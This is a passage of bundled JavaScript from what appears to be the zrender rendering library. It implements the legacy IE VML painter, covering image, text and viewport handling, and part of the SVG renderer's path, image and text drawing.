this._imageSrc) {\n                ow = this._imageWidth;\n                oh = this._imageHeight;\n            }\n        }\n        if (!image) {\n            return;\n        }\n\n        var x = style.x || 0;\n        var y = style.y || 0;\n\n        var dw = style.width;\n        var dh = style.height;\n\n        var sw = style.sWidth;\n        var sh = style.sHeight;\n        var sx = style.sx || 0;\n        var sy = style.sy || 0;\n\n        var hasCrop = sw && sh;\n\n        var vmlEl = this._vmlEl;\n        if (!vmlEl) {\n            // FIXME 使用 group 在 left, top 都不是 0 的时候就无法显示了。\n            // vmlEl = vmlCore.createNode('group');\n            vmlEl = doc.createElement('div');\n            initRootElStyle(vmlEl);\n\n            this._vmlEl = vmlEl;\n        }\n\n        var vmlElStyle = vmlEl.style;\n        var hasRotation = false;\n        var m;\n        var scaleX = 1;\n        var scaleY = 1;\n        if (this.transform) {\n            m = this.transform;\n            scaleX = sqrt(m[0] * m[0] + m[1] * m[1]);\n            scaleY = sqrt(m[2] * m[2] + m[3] * m[3]);\n\n            hasRotation = m[1] || m[2];\n        }\n        if (hasRotation) {\n            // If filters are necessary (rotation exists), create them\n            // filters are bog-slow, so only create them if abbsolutely necessary\n            // The following check doesn't account for skews (which don't exist\n            // in the canvas spec (yet) anyway.\n            // From excanvas\n            var p0 = [x, y];\n            var p1 = [x + dw, y];\n            var p2 = [x, y + dh];\n            var p3 = [x + dw, y + dh];\n            applyTransform(p0, p0, m);\n            applyTransform(p1, p1, m);\n            applyTransform(p2, p2, m);\n            applyTransform(p3, p3, m);\n\n            var maxX = mathMax$9(p0[0], p1[0], p2[0], p3[0]);\n            var maxY = mathMax$9(p0[1], p1[1], p2[1], p3[1]);\n\n            var transformFilter = [];\n            transformFilter.push('M11=', m[0] / scaleX, comma,\n                        'M12=', m[2] / scaleY, comma,\n                        'M21=', m[1] / scaleX, comma,\n                        'M22=', m[3] / scaleY, comma,\n                        'Dx=', round$3(x * scaleX + m[4]), comma,\n                        'Dy=', round$3(y * scaleY + m[5]));\n\n            vmlElStyle.padding = '0 ' + round$3(maxX) + 'px ' + round$3(maxY) + 'px 0';\n            // FIXME DXImageTransform 在 IE11 的兼容模式下不起作用\n            vmlElStyle.filter = imageTransformPrefix + '.Matrix('\n                + transformFilter.join('') + ', SizingMethod=clip)';\n\n        }\n        else {\n            if (m) {\n                x = x * scaleX + m[4];\n                y = y * scaleY + m[5];\n            }\n            vmlElStyle.filter = '';\n            vmlElStyle.left = round$3(x) + 'px';\n            vmlElStyle.top = round$3(y) + 'px';\n        }\n\n        var imageEl = this._imageEl;\n        var cropEl = this._cropEl;\n\n        if (!imageEl) {\n            imageEl = doc.createElement('div');\n            this._imageEl = imageEl;\n        }\n        var imageELStyle = imageEl.style;\n        if (hasCrop) {\n            // Needs know image original width and height\n            if (!(ow && oh)) {\n                var tmpImage = new Image();\n                var self = this;\n                tmpImage.onload = function () {\n                    tmpImage.onload = null;\n                    ow = tmpImage.width;\n                    oh = tmpImage.height;\n                    // Adjust image width and height to fit the ratio destinationSize / sourceSize\n                    imageELStyle.width = round$3(scaleX * ow * dw / sw) + 'px';\n                    imageELStyle.height = round$3(scaleY * oh * dh / sh) + 'px';\n\n                    // Caching image original width, height and src\n                    self._imageWidth = ow;\n                    self._imageHeight = oh;\n                    self._imageSrc = image;\n                };\n                tmpImage.src = image;\n            }\n            else {\n                imageELStyle.width = round$3(scaleX * ow * dw / sw) + 'px';\n                imageELStyle.height = round$3(scaleY * oh * dh / sh) + 'px';\n            }\n\n            if (!cropEl) {\n                cropEl = doc.createElement('div');\n                cropEl.style.overflow = 'hidden';\n                this._cropEl = cropEl;\n            }\n            var cropElStyle = cropEl.style;\n            cropElStyle.width = round$3((dw + sx * dw / sw) * scaleX);\n            cropElStyle.height = round$3((dh + sy * dh / sh) * scaleY);\n            cropElStyle.filter = imageTransformPrefix + '.Matrix(Dx='\n                    + (-sx * dw / sw * scaleX) + ',Dy=' + (-sy * dh / sh * scaleY) + ')';\n\n            if (!cropEl.parentNode) {\n                vmlEl.appendChild(cropEl);\n            }\n            if (imageEl.parentNode !== cropEl) {\n                cropEl.appendChild(imageEl);\n            }\n        }\n        else {\n            imageELStyle.width = round$3(scaleX * dw) + 'px';\n            imageELStyle.height = round$3(scaleY * dh) + 'px';\n\n            vmlEl.appendChild(imageEl);\n\n            if (cropEl && cropEl.parentNode) {\n                vmlEl.removeChild(cropEl);\n                this._cropEl = null;\n            }\n        }\n\n        var filterStr = '';\n        var alpha = style.opacity;\n        if (alpha < 1) {\n            filterStr += '.Alpha(opacity=' + round$3(alpha * 100) + ') ';\n        }\n        filterStr += imageTransformPrefix + '.AlphaImageLoader(src=' + image + ', SizingMethod=scale)';\n\n        imageELStyle.filter = filterStr;\n\n        vmlEl.style.zIndex = getZIndex(this.zlevel, this.z, this.z2);\n\n        // Append to root\n        append(vmlRoot, vmlEl);\n\n        // Text\n        if (style.text != null) {\n            this.drawRectText(vmlRoot, this.getBoundingRect());\n        }\n    };\n\n    ZImage.prototype.onRemove = function (vmlRoot) {\n        remove(vmlRoot, this._vmlEl);\n\n        this._vmlEl = null;\n        this._cropEl = null;\n        this._imageEl = null;\n\n        this.removeRectText(vmlRoot);\n    };\n\n    ZImage.prototype.onAdd = function (vmlRoot) {\n        append(vmlRoot, this._vmlEl);\n        this.appendRectText(vmlRoot);\n    };\n\n\n    /***************************************************\n     * TEXT\n     **************************************************/\n\n    var DEFAULT_STYLE_NORMAL = 'normal';\n\n    var fontStyleCache = {};\n    var fontStyleCacheCount = 0;\n    var MAX_FONT_CACHE_SIZE = 100;\n    var fontEl = document.createElement('div');\n\n    var getFontStyle = function (fontString) {\n        var fontStyle = fontStyleCache[fontString];\n        if (!fontStyle) {\n            // Clear cache\n            if (fontStyleCacheCount > MAX_FONT_CACHE_SIZE) {\n                fontStyleCacheCount = 0;\n                fontStyleCache = {};\n            }\n\n            var style = fontEl.style;\n            var fontFamily;\n            try {\n                style.font = fontString;\n                fontFamily = style.fontFamily.split(',')[0];\n            }\n            catch (e) {\n            }\n\n            fontStyle = {\n                style: style.fontStyle || DEFAULT_STYLE_NORMAL,\n                variant: style.fontVariant || DEFAULT_STYLE_NORMAL,\n                weight: style.fontWeight || DEFAULT_STYLE_NORMAL,\n                size: parseFloat(style.fontSize || 12) | 0,\n                family: fontFamily || 'Microsoft YaHei'\n            };\n\n            fontStyleCache[fontString] = fontStyle;\n            fontStyleCacheCount++;\n        }\n        return fontStyle;\n    };\n\n    var textMeasureEl;\n    // Overwrite measure text method\n    $override$1('measureText', function (text, textFont) {\n        var doc$$1 = doc;\n        if (!textMeasureEl) {\n            textMeasureEl = doc$$1.createElement('div');\n            textMeasureEl.style.cssText = 'position:absolute;top:-20000px;left:0;'\n                + 'padding:0;margin:0;border:none;white-space:pre;';\n            doc.body.appendChild(textMeasureEl);\n        }\n\n        try {\n            textMeasureEl.style.font = textFont;\n        }\n        catch (ex) {\n            // Ignore failures to set to invalid font.\n        }\n        textMeasureEl.innerHTML = '';\n        // Don't use innerHTML or innerText because they allow markup/whitespace.\n        textMeasureEl.appendChild(doc$$1.createTextNode(text));\n        return {\n            width: textMeasureEl.offsetWidth\n        };\n    });\n\n    var tmpRect$2 = new BoundingRect();\n\n    var drawRectText = function (vmlRoot, rect, textRect, fromTextEl) {\n\n        var style = this.style;\n\n        // Optimize, avoid normalize every time.\n        this.__dirty && normalizeTextStyle(style, true);\n\n        var text = style.text;\n        // Convert to string\n        text != null && (text += '');\n        if (!text) {\n            return;\n        }\n\n        // Convert rich text to plain text. Rich text is not supported in\n        // IE8-, but tags in rich text template will be removed.\n        if (style.rich) {\n            var contentBlock = parseRichText(text, style);\n            text = [];\n            for (var i = 0; i < contentBlock.lines.length; i++) {\n                var tokens = contentBlock.lines[i].tokens;\n                var textLine = [];\n                for (var j = 0; j < tokens.length; j++) {\n                    textLine.push(tokens[j].text);\n                }\n                text.push(textLine.join(''));\n            }\n            text = text.join('\\n');\n        }\n\n        var x;\n        var y;\n        var align = style.textAlign;\n        var verticalAlign = style.textVerticalAlign;\n\n        var fontStyle = getFontStyle(style.font);\n        // FIXME encodeHtmlAttribute ?\n        var font = fontStyle.style + ' ' + fontStyle.variant + ' ' + fontStyle.weight + ' '\n            + fontStyle.size + 'px \"' + fontStyle.family + '\"';\n\n        textRect = textRect || getBoundingRect(\n            text, font, align, verticalAlign, style.textPadding, style.textLineHeight\n        );\n\n        // Transform rect to view space\n        var m = this.transform;\n        // Ignore transform for text in other element\n        if (m && !fromTextEl) {\n            tmpRect$2.copy(rect);\n            tmpRect$2.applyTransform(m);\n            rect = tmpRect$2;\n        }\n\n        if (!fromTextEl) {\n            var textPosition = style.textPosition;\n            // Text position represented by coord\n            if (textPosition instanceof Array) {\n                x = rect.x + parsePercent$3(textPosition[0], rect.width);\n                y = rect.y + parsePercent$3(textPosition[1], rect.height);\n\n                align = align || 'left';\n            }\n            else {\n                var res = this.calculateTextPosition\n                    ? this.calculateTextPosition({}, style, rect)\n                    : calculateTextPosition({}, style, rect);\n                x = res.x;\n                y = res.y;\n\n                // Default align and baseline when has textPosition\n                align = align || res.textAlign;\n                verticalAlign = verticalAlign || res.textVerticalAlign;\n            }\n        }\n        else {\n            x = rect.x;\n            y = rect.y;\n        }\n\n        x = adjustTextX(x, textRect.width, align);\n        y = adjustTextY(y, textRect.height, verticalAlign);\n\n        // Force baseline 'middle'\n        y += textRect.height / 2;\n\n        // var fontSize = fontStyle.size;\n        // 1.75 is an arbitrary number, as there is no info about the text baseline\n        // switch (baseline) {\n            // case 'hanging':\n            // case 'top':\n            //     y += fontSize / 1.75;\n            //     break;\n        //     case 'middle':\n        //         break;\n        //     default:\n        //     // case null:\n        //     // case 'alphabetic':\n        //     // case 'ideographic':\n        //     // case 'bottom':\n        //         y -= fontSize / 2.25;\n        //         break;\n        // }\n\n        // switch (align) {\n        //     case 'left':\n        //         break;\n        //     case 'center':\n        //         x -= textRect.width / 2;\n        //         break;\n        //     case 'right':\n        //         x -= textRect.width;\n        //         break;\n            // case 'end':\n                // align = elementStyle.direction == 'ltr' ? 'right' : 'left';\n                // break;\n            // case 'start':\n                // align = elementStyle.direction == 'rtl' ? 'right' : 'left';\n                // break;\n            // default:\n            //     align = 'left';\n        // }\n\n        var createNode$$1 = createNode;\n\n        var textVmlEl = this._textVmlEl;\n        var pathEl;\n        var textPathEl;\n        var skewEl;\n        if (!textVmlEl) {\n            textVmlEl = createNode$$1('line');\n            pathEl = createNode$$1('path');\n            textPathEl = createNode$$1('textpath');\n            skewEl = createNode$$1('skew');\n\n            // FIXME Why here is not cammel case\n            // Align 'center' seems wrong\n            textPathEl.style['v-text-align'] = 'left';\n\n            initRootElStyle(textVmlEl);\n\n            pathEl.textpathok = true;\n            textPathEl.on = true;\n\n            textVmlEl.from = '0 0';\n            textVmlEl.to = '1000 0.05';\n\n            append(textVmlEl, skewEl);\n            append(textVmlEl, pathEl);\n            append(textVmlEl, textPathEl);\n\n            this._textVmlEl = textVmlEl;\n        }\n        else {\n            // 这里是在前面 appendChild 保证顺序的前提下\n            skewEl = textVmlEl.firstChild;\n            pathEl = skewEl.nextSibling;\n            textPathEl = pathEl.nextSibling;\n        }\n\n        var coords = [x, y];\n        var textVmlElStyle = textVmlEl.style;\n        // Ignore transform for text in other element\n        if (m && fromTextEl) {\n            applyTransform(coords, coords, m);\n\n            skewEl.on = true;\n\n            skewEl.matrix = m[0].toFixed(3) + comma + m[2].toFixed(3) + comma\n                            + m[1].toFixed(3) + comma + m[3].toFixed(3) + ',0,0';\n\n            // Text position\n            skewEl.offset = (round$3(coords[0]) || 0) + ',' + (round$3(coords[1]) || 0);\n            // Left top point as origin\n            skewEl.origin = '0 0';\n\n            textVmlElStyle.left = '0px';\n            textVmlElStyle.top = '0px';\n        }\n        else {\n            skewEl.on = false;\n            textVmlElStyle.left = round$3(x) + 'px';\n            textVmlElStyle.top = round$3(y) + 'px';\n        }\n\n        textPathEl.string = encodeHtmlAttribute(text);\n        // TODO\n        try {\n            textPathEl.style.font = font;\n        }\n        // Error font format\n        catch (e) {}\n\n        updateFillAndStroke(textVmlEl, 'fill', {\n            fill: style.textFill,\n            opacity: style.opacity\n        }, this);\n        updateFillAndStroke(textVmlEl, 'stroke', {\n            stroke: style.textStroke,\n            opacity: style.opacity,\n            lineDash: style.lineDash || null // style.lineDash can be `false`.\n        }, this);\n\n        textVmlEl.style.zIndex = getZIndex(this.zlevel, this.z, this.z2);\n\n        // Attached to root\n        append(vmlRoot, textVmlEl);\n    };\n\n    var removeRectText = function (vmlRoot) {\n        remove(vmlRoot, this._textVmlEl);\n        this._textVmlEl = null;\n    };\n\n    var appendRectText = function (vmlRoot) {\n        append(vmlRoot, this._textVmlEl);\n    };\n\n    var list = [RectText, Displayable, ZImage, Path, Text];\n\n    // In case Displayable has been mixed in RectText\n    for (var i$3 = 0; i$3 < list.length; i$3++) {\n        var proto$8 = list[i$3].prototype;\n        proto$8.drawRectText = drawRectText;\n        proto$8.removeRectText = removeRectText;\n        proto$8.appendRectText = appendRectText;\n    }\n\n    Text.prototype.brushVML = function (vmlRoot) {\n        var style = this.style;\n        if (style.text != null) {\n            this.drawRectText(vmlRoot, {\n                x: style.x || 0, y: style.y || 0,\n                width: 0, height: 0\n            }, this.getBoundingRect(), true);\n        }\n        else {\n            this.removeRectText(vmlRoot);\n        }\n    };\n\n    Text.prototype.onRemove = function (vmlRoot) {\n        this.removeRectText(vmlRoot);\n    };\n\n    Text.prototype.onAdd = function (vmlRoot) {\n        this.appendRectText(vmlRoot);\n    };\n}\n\n/**\n * VML Painter.\n *\n * @module zrender/vml/Painter\n */\n\nfunction parseInt10$1(val) {\n    return parseInt(val, 10);\n}\n\n/**\n * @alias module:zrender/vml/Painter\n */\nfunction VMLPainter(root, storage) {\n\n    initVML();\n\n    this.root = root;\n\n    this.storage = storage;\n\n    var vmlViewport = document.createElement('div');\n\n    var vmlRoot = document.createElement('div');\n\n    vmlViewport.style.cssText = 'display:inline-block;overflow:hidden;position:relative;width:300px;height:150px;';\n\n    vmlRoot.style.cssText = 'position:absolute;left:0;top:0;';\n\n    root.appendChild(vmlViewport);\n\n    this._vmlRoot = vmlRoot;\n    this._vmlViewport = vmlViewport;\n\n    this.resize();\n\n    // Modify storage\n    var oldDelFromStorage = storage.delFromStorage;\n    var oldAddToStorage = storage.addToStorage;\n    storage.delFromStorage = function (el) {\n        oldDelFromStorage.call(storage, el);\n\n        if (el) {\n            el.onRemove && el.onRemove(vmlRoot);\n        }\n    };\n\n    storage.addToStorage = function (el) {\n        // Displayable already has a vml node\n        el.onAdd && el.onAdd(vmlRoot);\n\n        oldAddToStorage.call(storage, el);\n    };\n\n    this._firstPaint = true;\n}\n\nVMLPainter.prototype = {\n\n    constructor: VMLPainter,\n\n    getType: function () {\n        return 'vml';\n    },\n\n    /**\n     * @return {HTMLDivElement}\n     */\n    getViewportRoot: function () {\n        return this._vmlViewport;\n    },\n\n    getViewportRootOffset: function () {\n        var viewportRoot = this.getViewportRoot();\n        if (viewportRoot) {\n            return {\n                offsetLeft: viewportRoot.offsetLeft || 0,\n                offsetTop: viewportRoot.offsetTop || 0\n            };\n        }\n    },\n\n    /**\n     * 刷新\n     */\n    refresh: function () {\n\n        var list = this.storage.getDisplayList(true, true);\n\n        this._paintList(list);\n    },\n\n    _paintList: function (list) {\n        var vmlRoot = this._vmlRoot;\n        for (var i = 0; i < list.length; i++) {\n            var el = list[i];\n            if (el.invisible || el.ignore) {\n                if (!el.__alreadyNotVisible) {\n                    el.onRemove(vmlRoot);\n                }\n                // Set as already invisible\n                el.__alreadyNotVisible = true;\n            }\n            else {\n                if (el.__alreadyNotVisible) {\n                    el.onAdd(vmlRoot);\n                }\n                el.__alreadyNotVisible = false;\n                if (el.__dirty) {\n                    el.beforeBrush && el.beforeBrush();\n                    (el.brushVML || el.brush).call(el, vmlRoot);\n                    el.afterBrush && el.afterBrush();\n                }\n            }\n            el.__dirty = false;\n        }\n\n        if (this._firstPaint) {\n            // Detached from document at first time\n            // to avoid page refreshing too many times\n\n            // FIXME 如果每次都先 removeChild 可能会导致一些填充和描边的效果改变\n            this._vmlViewport.appendChild(vmlRoot);\n            this._firstPaint = false;\n        }\n    },\n\n    resize: function (width, height) {\n        var width = width == null ? this._getWidth() : width;\n        var height = height == null ? this._getHeight() : height;\n\n        if (this._width !== width || this._height !== height) {\n            this._width = width;\n            this._height = height;\n\n            var vmlViewportStyle = this._vmlViewport.style;\n            vmlViewportStyle.width = width + 'px';\n            vmlViewportStyle.height = height + 'px';\n        }\n    },\n\n    dispose: function () {\n        this.root.innerHTML = '';\n\n        this._vmlRoot =\n        this._vmlViewport =\n        this.storage = null;\n    },\n\n    getWidth: function () {\n        return this._width;\n    },\n\n    getHeight: function () {\n        return this._height;\n    },\n\n    clear: function () {\n        if (this._vmlViewport) {\n            this.root.removeChild(this._vmlViewport);\n        }\n    },\n\n    _getWidth: function () {\n        var root = this.root;\n        var stl = root.currentStyle;\n\n        return ((root.clientWidth || parseInt10$1(stl.width))\n                - parseInt10$1(stl.paddingLeft)\n                - parseInt10$1(stl.paddingRight)) | 0;\n    },\n\n    _getHeight: function () {\n        var root = this.root;\n        var stl = root.currentStyle;\n\n        return ((root.clientHeight || parseInt10$1(stl.height))\n                - parseInt10$1(stl.paddingTop)\n                - parseInt10$1(stl.paddingBottom)) | 0;\n    }\n};\n\n// Not supported methods\nfunction createMethodNotSupport(method) {\n    return function () {\n        logError$1('In IE8.0 VML mode painter not support method \"' + method + '\"');\n    };\n}\n\n// Unsupported methods\neach$1([\n    'getLayer', 'insertLayer', 'eachLayer', 'eachBuiltinLayer', 'eachOtherLayer', 'getLayers',\n    'modLayer', 'delLayer', 'clearLayer', 'toDataURL', 'pathToImage'\n], function (name) {\n    VMLPainter.prototype[name] = createMethodNotSupport(name);\n});\n\nregisterPainter('vml', VMLPainter);\n\nvar svgURI = 'http://www.w3.org/2000/svg';\n\nfunction createElement(name) {\n    return document.createElementNS(svgURI, name);\n}\n\n// TODO\n// 1. shadow\n// 2. Image: sx, sy, sw, sh\n\nvar CMD$4 = PathProxy.CMD;\nvar arrayJoin = Array.prototype.join;\n\nvar NONE = 'none';\nvar mathRound = Math.round;\nvar mathSin$3 = Math.sin;\nvar mathCos$3 = Math.cos;\nvar PI$6 = Math.PI;\nvar PI2$6 = Math.PI * 2;\nvar degree = 180 / PI$6;\n\nvar EPSILON$4 = 1e-4;\n\nfunction round4(val) {\n    return mathRound(val * 1e4) / 1e4;\n}\n\nfunction isAroundZero$1(val) {\n    return val < EPSILON$4 && val > -EPSILON$4;\n}\n\nfunction pathHasFill(style, isText) {\n    var fill = isText ? style.textFill : style.fill;\n    return fill != null && fill !== NONE;\n}\n\nfunction pathHasStroke(style, isText) {\n    var stroke = isText ? style.textStroke : style.stroke;\n    return stroke != null && stroke !== NONE;\n}\n\nfunction setTransform(svgEl, m) {\n    if (m) {\n        attr(svgEl, 'transform', 'matrix(' + arrayJoin.call(m, ',') + ')');\n    }\n}\n\nfunction attr(el, key, val) {\n    if (!val || val.type !== 'linear' && val.type !== 'radial') {\n        // Don't set attribute for gradient, since it need new dom nodes\n        el.setAttribute(key, val);\n    }\n}\n\nfunction attrXLink(el, key, val) {\n    el.setAttributeNS('http://www.w3.org/1999/xlink', key, val);\n}\n\nfunction bindStyle(svgEl, style, isText, el) {\n    if (pathHasFill(style, isText)) {\n        var fill = isText ? style.textFill : style.fill;\n        fill = fill === 'transparent' ? NONE : fill;\n        attr(svgEl, 'fill', fill);\n        attr(svgEl, 'fill-opacity', style.fillOpacity != null ? style.fillOpacity * style.opacity : style.opacity);\n    }\n    else {\n        attr(svgEl, 'fill', NONE);\n    }\n\n    if (pathHasStroke(style, isText)) {\n        var stroke = isText ? style.textStroke : style.stroke;\n        stroke = stroke === 'transparent' ? NONE : stroke;\n        attr(svgEl, 'stroke', stroke);\n        var strokeWidth = isText\n            ? style.textStrokeWidth\n            : style.lineWidth;\n        var strokeScale = !isText && style.strokeNoScale\n            ? el.getLineScale()\n            : 1;\n        attr(svgEl, 'stroke-width', strokeWidth / strokeScale);\n        // stroke then fill for text; fill then stroke for others\n        attr(svgEl, 'paint-order', isText ? 'stroke' : 'fill');\n        attr(svgEl, 'stroke-opacity', style.strokeOpacity != null ? style.strokeOpacity : style.opacity);\n        var lineDash = style.lineDash;\n        if (lineDash) {\n            attr(svgEl, 'stroke-dasharray', style.lineDash.join(','));\n            attr(svgEl, 'stroke-dashoffset', mathRound(style.lineDashOffset || 0));\n        }\n        else {\n            attr(svgEl, 'stroke-dasharray', '');\n        }\n\n        // PENDING\n        style.lineCap && attr(svgEl, 'stroke-linecap', style.lineCap);\n        style.lineJoin && attr(svgEl, 'stroke-linejoin', style.lineJoin);\n        style.miterLimit && attr(svgEl, 'stroke-miterlimit', style.miterLimit);\n    }\n    else {\n        attr(svgEl, 'stroke', NONE);\n    }\n}\n\n/***************************************************\n * PATH\n **************************************************/\nfunction pathDataToString$1(path) {\n    var str = [];\n    var data = path.data;\n    var dataLength = path.len();\n    for (var i = 0; i < dataLength;) {\n        var cmd = data[i++];\n        var cmdStr = '';\n        var nData = 0;\n        switch (cmd) {\n            case CMD$4.M:\n                cmdStr = 'M';\n                nData = 2;\n                break;\n            case CMD$4.L:\n                cmdStr = 'L';\n                nData = 2;\n                break;\n            case CMD$4.Q:\n                cmdStr = 'Q';\n                nData = 4;\n                break;\n            case CMD$4.C:\n                cmdStr = 'C';\n                nData = 6;\n                break;\n            case CMD$4.A:\n                var cx = data[i++];\n                var cy = data[i++];\n                var rx = data[i++];\n                var ry = data[i++];\n                var theta = data[i++];\n                var dTheta = data[i++];\n                var psi = data[i++];\n                var clockwise = data[i++];\n\n                var dThetaPositive = Math.abs(dTheta);\n                var isCircle = isAroundZero$1(dThetaPositive - PI2$6)\n                    || (clockwise ? dTheta >= PI2$6 : -dTheta >= PI2$6);\n\n                // Mapping to 0~2PI\n                var unifiedTheta = dTheta > 0 ? dTheta % PI2$6 : (dTheta % PI2$6 + PI2$6);\n\n                var large = false;\n                if (isCircle) {\n                    large = true;\n                }\n                else if (isAroundZero$1(dThetaPositive)) {\n                    large = false;\n                }\n                else {\n                    large = (unifiedTheta >= PI$6) === !!clockwise;\n                }\n\n                var x0 = round4(cx + rx * mathCos$3(theta));\n                var y0 = round4(cy + ry * mathSin$3(theta));\n\n                // It will not draw if start point and end point are exactly the same\n                // We need to shift the end point with a small value\n                // FIXME A better way to draw circle ?\n                if (isCircle) {\n                    if (clockwise) {\n                        dTheta = PI2$6 - 1e-4;\n                    }\n                    else {\n                        dTheta = -PI2$6 + 1e-4;\n                    }\n\n                    large = true;\n\n                    if (i === 9) {\n                        // Move to (x0, y0) only when CMD.A comes at the\n                        // first position of a shape.\n                        // For instance, when drawing a ring, CMD.A comes\n                        // after CMD.M, so it's unnecessary to move to\n                        // (x0, y0).\n                        str.push('M', x0, y0);\n                    }\n                }\n\n                var x = round4(cx + rx * mathCos$3(theta + dTheta));\n                var y = round4(cy + ry * mathSin$3(theta + dTheta));\n\n                // FIXME Ellipse\n                str.push('A', round4(rx), round4(ry),\n                    mathRound(psi * degree), +large, +clockwise, x, y);\n                break;\n            case CMD$4.Z:\n                cmdStr = 'Z';\n                break;\n            case CMD$4.R:\n                var x = round4(data[i++]);\n                var y = round4(data[i++]);\n                var w = round4(data[i++]);\n                var h = round4(data[i++]);\n                str.push(\n                    'M', x, y,\n                    'L', x + w, y,\n                    'L', x + w, y + h,\n                    'L', x, y + h,\n                    'L', x, y\n                );\n                break;\n        }\n        cmdStr && str.push(cmdStr);\n        for (var j = 0; j < nData; j++) {\n            // PENDING With scale\n            str.push(round4(data[i++]));\n        }\n    }\n    return str.join(' ');\n}\n\nvar svgPath = {};\nsvgPath.brush = function (el) {\n    var style = el.style;\n\n    var svgEl = el.__svgEl;\n    if (!svgEl) {\n        svgEl = createElement('path');\n        el.__svgEl = svgEl;\n    }\n\n    if (!el.path) {\n        el.createPathProxy();\n    }\n    var path = el.path;\n\n    if (el.__dirtyPath) {\n        path.beginPath();\n        path.subPixelOptimize = false;\n        el.buildPath(path, el.shape);\n        el.__dirtyPath = false;\n\n        var pathStr = pathDataToString$1(path);\n        if (pathStr.indexOf('NaN') < 0) {\n            // Ignore illegal path, which may happen such in out-of-range\n            // data in Calendar series.\n            attr(svgEl, 'd', pathStr);\n        }\n    }\n\n    bindStyle(svgEl, style, false, el);\n    setTransform(svgEl, el.transform);\n\n    if (style.text != null) {\n        svgTextDrawRectText(el, el.getBoundingRect());\n    }\n    else {\n        removeOldTextNode(el);\n    }\n};\n\n/***************************************************\n * IMAGE\n **************************************************/\nvar svgImage = {};\nsvgImage.brush = function (el) {\n    var style = el.style;\n    var image = style.image;\n\n    if (image instanceof HTMLImageElement) {\n        var src = image.src;\n        image = src;\n    }\n    if (!image) {\n        return;\n    }\n\n    var x = style.x || 0;\n    var y = style.y || 0;\n\n    var dw = style.width;\n    var dh = style.height;\n\n    var svgEl = el.__svgEl;\n    if (!svgEl) {\n        svgEl = createElement('image');\n        el.__svgEl = svgEl;\n    }\n\n    if (image !== el.__imageSrc) {\n        attrXLink(svgEl, 'href', image);\n        // Caching image src\n        el.__imageSrc = image;\n    }\n\n    attr(svgEl, 'width', dw);\n    attr(svgEl, 'height', dh);\n\n    attr(svgEl, 'x', x);\n    attr(svgEl, 'y', y);\n\n    setTransform(svgEl, el.transform);\n\n    if (style.text != null) {\n        svgTextDrawRectText(el, el.getBoundingRect());\n    }\n    else {\n        removeOldTextNode(el);\n    }\n};\n\n/***************************************************\n * TEXT\n **************************************************/\nvar svgText = {};\nvar _tmpTextHostRect = new BoundingRect();\nvar _tmpTextBoxPos = {};\nvar _tmpTextTransform = [];\nvar TEXT_ALIGN_TO_ANCHRO = {\n    left: 'start',\n    right: 'end',\n    center: 'middle',\n    middle: 'middle'\n};\n\n/**\n * @param {module:zrender/Element} el\n * @param {Object|boolean} [hostRect] {x, y, width, height}\n *        If set false, rect text is not used.\n */\nvar svgTextDrawRectText = function (el, hostRect) {\n    var style = el.style;\n    var elTransform = el.transform;\n    var needTransformTextByHostEl = el instanceof Text || style.transformText;\n\n    el.__dirty && normalizeTextStyle(style, true);\n\n    var text = style.text;\n    // Convert to string\n    text != null && (text += '');\n    if (!needDrawText(text, style)) {\n        return;\n    }\n    // render empty text for svg if no text but need draw text.\n    text == null && (text = '');\n\n    // Follow the setting in the canvas renderer, if not transform the\n    // text, transform the hostRect, by which the text is located.\n    if (!needTransformTextByHostEl && elTransform) {\n        _tmpTextHostRect.copy(hostRect);\n        _tmpTextHostRect.applyTransform(elTransform);\n        hostRect = _tmpTextHostRect;\n    }\n\n    var textSvgEl = el.__textSvgEl;\n    if (!textSvgEl) {\n        textSvgEl = createElement('text');\n        el.__textSvgEl = textSvgEl;\n    }\n\n    // style.font has been normalized by `normalizeTextStyle`.\n    var textSvgElStyle = textSvgEl.style;\n    var font = style.font || DEFAULT_FONT$1;\n    var computedFont = textSvgEl.__computedFont;\n    if (font !== textSvgEl.__styleFont) {\n        textSvgElStyle.font = textSvgEl.__styleFont = font;\n        // The computedFont might not be the orginal font if it is illegal font.\n        computedFont = textSvgEl.__computedFont = textSvgElStyle.font;\n    }\n\n    var textPadding = style.textPadding;\n    var textLineHeight = style.textLineHeight;\n\n    var contentBlock = el.__textCotentBlock;\n    if (!contentBlock || el.__dirtyText) {\n        contentBlock = el.__textCotentBlock = parsePlainText(\n            text, computedFont, textPadding, textLineHeight, style.truncate\n        );\n    }\n\n    var outerHeight = contentBlock.outerHeight;\n    var lineHeight = contentBlock.lineHeight;\n\n    getBoxPosition(_tmpTextBoxPos, el, style, hostRect);\n    var baseX = _tmpTextBoxPos.baseX;\n    var baseY = _tmpTextBoxPos.baseY;\n    var textAlign = _tmpTextBoxPos.textAlign || 'left';\n    var textVerticalAlign = _tmpTextBoxPos.textVerticalAlign;\n\n    setTextTransform(\n        textSvgEl, needTransformTextByHostEl, elTransform, style, hostRect, baseX, baseY\n    );\n\n    var boxY = adjustTextY(baseY, outerHeight, textVerticalAlign);\n    var textX = baseX;\n    var textY = boxY;\n\n    // TODO needDrawBg\n    if (textPadding) {\n        textX = getTextXForPadding$1(baseX, textAlign, textPadding);\n        textY += textPadding[0];\n    }\n\n    // `textBaseline` is set as 'middle'.\n    textY += lineHeight / 2;\n\n    bindStyle(textSvgEl, style, true, el);\n\n    // FIXME\n    // Add a <style> to reset all of the text font as inherit?\n    // otherwise the outer <style> may set the unexpected style.\n\n    // Font may affect position of each tspan elements\n    var canCacheByTextString = contentBlock.canCacheByTextString;\n    var tspanList = el.__tspanList || (el.__tspanList = []);\n    var tspanOriginLen = tspanList.length;\n\n    // Optimize for most cases, just compare text string to determine change.\n    if (canCacheByTextString && el.__canCacheByTextString && el.__text === text) {\n        if (el.__dirtyText && tspanOriginLen) {\n            for (var idx = 0; idx < tspanOriginLen; ++idx) {\n                updateTextLocation(tspanList[idx], textAlign, textX, textY + idx * lineHeight);\n            }\n        }\n    }\n    else {\n        el.__text = text;\n        el.__canCacheByTextString = canCacheByTextString;\n        var textLines = contentBlock.lines;\n        var nTextLines = textLines.length;\n\n        var idx = 0;\n        for (; idx < nTextLines; idx++) {\n            // Using cached tspan elements\n            var tspan = tspanList[idx];\n            var singleLineText = textLines[idx];\n\n            if (!tspan) {\n                tspan = tspanList[idx] = createElement('tspan');\n                textSvgEl.appendChild(tspan);\n                tspan.appendChild(document.createTextNode(singleLineText));\n            }\n            else if (tspan.__zrText !== singleLineText) {\n                tspan.innerHTML = '';\n                tspan.appendChild(document.createTextNode(singleLineText));\n            }\n            updateTextLocation(tspan, textAlign, textX, textY + idx * lineHeight);\n        